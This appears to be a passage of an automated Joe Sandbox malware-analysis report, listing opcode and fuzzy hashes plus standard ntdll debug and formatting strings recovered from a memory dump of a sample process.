                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                • Instruction ID: 0ac4d6ed598ae01e217fdacb2ffda49b0da24b826fb7cc4b81ee5ea5ac7d1506
                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                • Instruction Fuzzy Hash: 53F0E539704341DFDB1ADF1AD050A997BE4FB41360B000054F8C28B341D775E982DB50
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                • Instruction ID: da77727d14050c0c04a73daee74b1f1d38c0de8358006015555551de42f83650
                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                • Instruction Fuzzy Hash: 6DE0D833244645ABD3295E59A801B66FBA5DBD4FA0F170439E242CB954DB70DC40C7D8
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1349f7063ce16951b8add1227c912b0b5e2e9b8a755b125b360fde4999749f63
                                                                • Instruction ID: a606a3388c9a14687961243f9ae4adba56455b5ffb03a1e328e44819b791c5d3
                                                                • Opcode Fuzzy Hash: 1349f7063ce16951b8add1227c912b0b5e2e9b8a755b125b360fde4999749f63
                                                                • Instruction Fuzzy Hash: 7CF0A035E265918FE77AD72CE1C0BD177E0AB10620F1A8554D44687D13C324EC41C650
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                • Instruction ID: f24c6dc120853a2c688b1e232fb19fb27c5b8c86d3e8d06a259cb9ca35f8bdf5
                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                • Instruction Fuzzy Hash: 7FE0DF32A00510BBDF25A7998D02F9ABEACDBA4FA0F054064B600E70D4E630DE00CAD0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                • Instruction ID: d2b9ecece32218e8c7c9766f27916e8d8190ab9736af6d3eee6ebfca18a5f401
                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                • Instruction Fuzzy Hash: D8E09B31A403509FCB299A1DD180AD3B7F8DF99664F15847DEA0547612C331F942C6D0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                • Instruction ID: e37ddcd058f84b4722db3ce0e8c2ebccb389581d4b7d9117c084aabb41fd3dfd
                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                • Instruction Fuzzy Hash: E1D0A932204628ABDB72AA1CFC00FC333E8BB88760F060459B018CB050C364AC81CA84
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                • Instruction ID: e2ab59cc02d9b3b8b47967588d50c7f3e6be7f15f2d9d46357afbcd1a76c1483
                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                • Instruction Fuzzy Hash: E1E08C31900688DFCF56DF59C640F8AFBF4BB84B00F150008A5485B620C324A900CB80
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                • Instruction ID: 395bcd73005e137757e5d8f3c7aa9cd98910a114188b921b5d24905466bd6c89
                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                • Instruction Fuzzy Hash: 46D02233312031D7CF2856656810FA76D05AF80AA0F0A006C350A93800C0088C82C2E0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                • Instruction ID: 2402da1110fdc286e15f019e0990d5a37c9695555a8392d6b804675478a522b8
                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                • Instruction Fuzzy Hash: 0AD012371D054DBBCB119F66DC02F957BA9E764BA0F454020B6048B5A0C63AE950D684
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1dd2895028625c87c8e8b6acb52c5a98da7f85ff6bcc21edd6f4bba454d1dfaf
                                                                • Instruction ID: 29c950299cd5143695fa23c853b79cc0663fb3c989a9298f6af7573ef9eb1112
                                                                • Opcode Fuzzy Hash: 1dd2895028625c87c8e8b6acb52c5a98da7f85ff6bcc21edd6f4bba454d1dfaf
                                                                • Instruction Fuzzy Hash: 7CD05E3164A006CBDF1FCB09C510B6A7A70EB10640B40007CEB5051420E328D801C680
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                • Instruction ID: e93b95fc4e8c9100f9c835930f01e3ea2e728849dda48f556ffb518931f981d9
                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                • Instruction Fuzzy Hash: 45D09239252A80CFD69A8B0CC5A5B1533E4BB84A44F8504D4E541CBF26D62CE940CA10
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                • Instruction ID: bd0f5e60cfe655e4ab0648d5265cf26ad44fb3543e6ddfb2cad8630022cc0ab0
                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                • Instruction Fuzzy Hash: 33C01232150648AFC7119A95CD01F4177A9E798B50F010021F3044B570C535E810D684
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                • Instruction ID: a09e862bb376ef165799286c96bbd6e5924195090d7cf1f89f1a70845e7be035
                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                • Instruction Fuzzy Hash: F3D01236100248EFCB06DF41C890E9A772AFBD8750F108019FD190B750CA71ED62DA50
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                • Instruction ID: e033b41a20641f6fbcad6c5b36cea29eb4a0980f82cc768cbdb77213de22aa9e
                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                • Instruction Fuzzy Hash: D4C04C757016418FCF15DB19D294F4977E4F744750F150890E945CBB21E724E801CA10
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c5cc69c25075c9fa8f7bce03d7a9508cc7091992c66f41b87b3841e4f5f34689
                                                                • Instruction ID: c8d3632fff74ff7d5c712df55252ff86bf7b0536f30fb0c1f84676b7864e1a7e
                                                                • Opcode Fuzzy Hash: c5cc69c25075c9fa8f7bce03d7a9508cc7091992c66f41b87b3841e4f5f34689
                                                                • Instruction Fuzzy Hash: FC900231605800129544725849845465015A7E0301B55C111F0429554CCB148A576361
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95e15a2a2f8c728f0d0b5d37e456aa1870213aa06fbae41fbc1c60473df32aa9
                                                                • Instruction ID: ba7300798770eb82af8684ecd37aabbc84d5ebf7fc76f1f58fe042e73a080b1a
                                                                • Opcode Fuzzy Hash: 95e15a2a2f8c728f0d0b5d37e456aa1870213aa06fbae41fbc1c60473df32aa9
                                                                • Instruction Fuzzy Hash: 17900261601500424544725849044067015A7E1301395C215B0559560CC7188956A369
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe2de2be41359ad52decc957f605d9defb84e7af210e7026f5eabb60b2b6843c
                                                                • Instruction ID: edce89c7b0bd539298b0f26bdd5b46ad4cee2daec7bf18bd07b50208243b737a
                                                                • Opcode Fuzzy Hash: fe2de2be41359ad52decc957f605d9defb84e7af210e7026f5eabb60b2b6843c
                                                                • Instruction Fuzzy Hash: 5090023120140802D50872584904686101597D0301F55C111B6029655ED76589927231
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1093a9514a90eb479c3c3e4e1c97110d15ecffacc7806a139a20c2a7bf6cb337
                                                                • Instruction ID: a8553cf7e0979ab0907f8f14b5639c00ff5b49db5896a7b18cc6430de55ed54f
                                                                • Opcode Fuzzy Hash: 1093a9514a90eb479c3c3e4e1c97110d15ecffacc7806a139a20c2a7bf6cb337
                                                                • Instruction Fuzzy Hash: 6090023160540802D55472584514746101597D0301F55C111B0029654DC7558B5677A1
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a54f745310233c381e2af6e1d6ccc057262e46ef4ed502b4d2a6cd7917bf787
                                                                • Instruction ID: 9002e8d83a9bcfb0b063e707ecfb049778a2d3d92dc55f3767e8f5b2626d153e
                                                                • Opcode Fuzzy Hash: 1a54f745310233c381e2af6e1d6ccc057262e46ef4ed502b4d2a6cd7917bf787
                                                                • Instruction Fuzzy Hash: 4490023120140802D5847258450464A101597D1301F95C115B002A654DCB158B5A77A1
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f37a7fa38c0c62fa80eeed91ce7d3b9f87e998fbdbaa19cc9813825266188f08
                                                                • Instruction ID: f82cb79d8ed7c04eb51f578cebb9ad3c46a3f9bbf5d53a7d01f7216b1286e281
                                                                • Opcode Fuzzy Hash: f37a7fa38c0c62fa80eeed91ce7d3b9f87e998fbdbaa19cc9813825266188f08
                                                                • Instruction Fuzzy Hash: E190023120544842D54472584504A46102597D0305F55C111B0069694DD7258E56B761
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed33fe8f617c3330c7433af8ce96222e7294a41fef343f65b9db0f54db52132d
                                                                • Instruction ID: 09b884d827357e036ff21b600d7808bb2a3eb1ef350f52b6031bb3f3dad804c3
                                                                • Opcode Fuzzy Hash: ed33fe8f617c3330c7433af8ce96222e7294a41fef343f65b9db0f54db52132d
                                                                • Instruction Fuzzy Hash: E79002A1201540924904B3588504B0A551597E0201B55C116F1059560CC6258952A235
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 951bb3ed24817e5cc779210af338af8f26589de90b4a5f6fd5dac357d4bfe541
                                                                • Instruction ID: fe9a3c548edc3ba96fd897ef46601e43e0981d593ee60aa457612591398613cc
                                                                • Opcode Fuzzy Hash: 951bb3ed24817e5cc779210af338af8f26589de90b4a5f6fd5dac357d4bfe541
                                                                • Instruction Fuzzy Hash: CD900225211400030509B6580704507105697D5351355C121F101A550CD72189626221
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a96276282620a7d596092b4a91380ab79f348f705d43dc9e57d3bba4ddbee4b
                                                                • Instruction ID: 791f388acb80579dfb16823327cc5c0fc5ae717e6f987542bf75f7d393099522
                                                                • Opcode Fuzzy Hash: 7a96276282620a7d596092b4a91380ab79f348f705d43dc9e57d3bba4ddbee4b
                                                                • Instruction Fuzzy Hash: 5A900225221400020549B658070450B1455A7D6351395C115F141B590CC72189666321
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a795bc495812bde3e0fc9795c838309abcf81f4cc157675064116cedff123cf8
                                                                • Instruction ID: 8d564a5ad7009dd637767af9d6acd3d7923d19125ebcb3cbbd60065324f6e673
                                                                • Opcode Fuzzy Hash: a795bc495812bde3e0fc9795c838309abcf81f4cc157675064116cedff123cf8
                                                                • Instruction Fuzzy Hash: D890022921340002D5847258550860A101597D1202F95D515B001A558CCA15896A6321
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54e92b2038cfd0aaf66c15068ca892c3d170c53108376cb0030b78d111f59347
                                                                • Instruction ID: cf9480a6c4990da29c87b83518579bf07b7570f625ed28c1953e99595408b5ad
                                                                • Opcode Fuzzy Hash: 54e92b2038cfd0aaf66c15068ca892c3d170c53108376cb0030b78d111f59347
                                                                • Instruction Fuzzy Hash: FA90022120544442D50476585508A06101597D0205F55D111B1069595DC7358952B231
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 73f8554a2f80d86eecd88ccfd1e9c1cb3b3e3e86d30db7f6c9506b490d94f51c
                                                                • Instruction ID: 3d1ab1ba42d3431bbace9a878765e3c2ec3461b4770cc69a7c9e42c2311879bf
                                                                • Opcode Fuzzy Hash: 73f8554a2f80d86eecd88ccfd1e9c1cb3b3e3e86d30db7f6c9506b490d94f51c
                                                                • Instruction Fuzzy Hash: 135109B1B00126BFCF29DB9C889097EFBF8BF482447548269F4A5D7641E374DE1087A1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 22f5b67358be5399412d6b3c00cba0a68fb2447cf8282f89a19c25004e090812
                                                                • Instruction ID: 4af8b2a2434a88bb43fca54fa4326a60ac054a9ec30caf1723cb62b906145b03
                                                                • Opcode Fuzzy Hash: 22f5b67358be5399412d6b3c00cba0a68fb2447cf8282f89a19c25004e090812
                                                                • Instruction Fuzzy Hash: 2151F6B1A00645BEDF38DF9DC8909BFB7F8EB48200B048459E5E6C7682D7B4EA008760
                                                                Strings
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01154742
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01154725
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011546FC
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01154655
                                                                • ExecuteOptions, xrefs: 011546A0
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01154787
                                                                • Execute=1, xrefs: 01154713
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: b62a733d8bacb3c67bbeb7fd711880aeeaf6f14040fa31e7600235bd2275db53
                                                                • Instruction ID: 0fa7c9ae14c101c3b8694d3a4167c824a32976ab190ba8cbbe49be4c4d372df4
                                                                • Opcode Fuzzy Hash: b62a733d8bacb3c67bbeb7fd711880aeeaf6f14040fa31e7600235bd2275db53
                                                                • Instruction Fuzzy Hash: DD515D31A0021ABAEF1DAB69EC95FADB7A8EF14304F0404BDD605A72C1E7719A51CF51
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction ID: ca467a4b960a3fa463a4856181c72118d84cf26875d4b8a8350ab5b930d76bb8
                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction Fuzzy Hash: EF021671508342AFD709DF28C590AAFBBE5EFD8704F04892DF9894B2A4DB31E945CB52
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: f72e83b349979a8b038303e0979368c591869f61fed0101d9e1838481a82a22d
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: 5981E170E096698EEF2DCF6CC8917FEBBB2AF45320F184119D861A72D1C7748860CB59
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: de887844b1defb5c13ae3e5784e2e8b64c73c9cf2e150cda7c2f61ab0288d8b6
                                                                • Instruction ID: 4f0681a665998c7d34f6e753b86dae1aabe6749c6c7083e80edf2994465f52c3
                                                                • Opcode Fuzzy Hash: de887844b1defb5c13ae3e5784e2e8b64c73c9cf2e150cda7c2f61ab0288d8b6
                                                                • Instruction Fuzzy Hash: 022177BAE00119ABDF14DF79DC40AFEBBF8EF58654F050126E915D7200E730D9118BA1
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011502BD
                                                                • RTL: Re-Waiting, xrefs: 0115031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011502E7
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 596f54e163a619f22dbc22ffc312e134d04d47a17846073b275aee00aa5527a1
                                                                • Instruction ID: 0e3ca7e340adb57b129b39efdd2025a12675ec487963de9496a22730d85b86da
                                                                • Opcode Fuzzy Hash: 596f54e163a619f22dbc22ffc312e134d04d47a17846073b275aee00aa5527a1
                                                                • Instruction Fuzzy Hash: DDE1A130A08742DFD76ECF68C885B5ABBE0BB88314F144A1DF5A58B2D1D7B4D946CB42
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 01157BAC
                                                                • RTL: Resource at %p, xrefs: 01157B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01157B7F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 041842e0af9738b10ae8564eeeb457c3ace4a25b3530dd156926609255c11026
                                                                • Instruction ID: b8df556e2a93bc6356c54828ee51f75de5279588097722c21b58e25e1c528936
                                                                • Opcode Fuzzy Hash: 041842e0af9738b10ae8564eeeb457c3ace4a25b3530dd156926609255c11026
                                                                • Instruction Fuzzy Hash: F841E3317097039FD728DE29C841B6AB7E5EF98710F000A2DF95ADB680DB31E4058B96
                                                                APIs
